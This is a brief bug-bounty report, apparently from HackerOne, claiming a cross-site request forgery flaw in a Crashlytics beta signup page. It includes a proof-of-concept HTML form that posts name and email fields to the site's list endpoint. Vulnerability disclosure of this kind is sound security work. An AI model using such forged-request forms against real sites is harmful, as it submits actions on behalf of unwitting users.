Twitter: CSRF in crashlytics.com

2014-05-28T20:30:28
ID H1:13856
Type hackerone
Reporter defmax
Modified 2014-09-08T14:55:13

Description

Hello Sir

This is N B Sri Harsha

I Have Found An CSRF in http://try.crashlytics.com/

POC ;-

<form method="POST" action="http://try.crashlytics.com/list/" class="validatable" id="beta_form"> <input id="validate" class="clear validate validate-name validate-message" placeholder="your name" name="name" type="text"> <input id="validate" class="clear validate validate-message" placeholder="name@server.com" name="email" type="text"> <input name="sitereferral" value="" type="hidden"> <input value="" id="emailVerify" type="submit"> </form>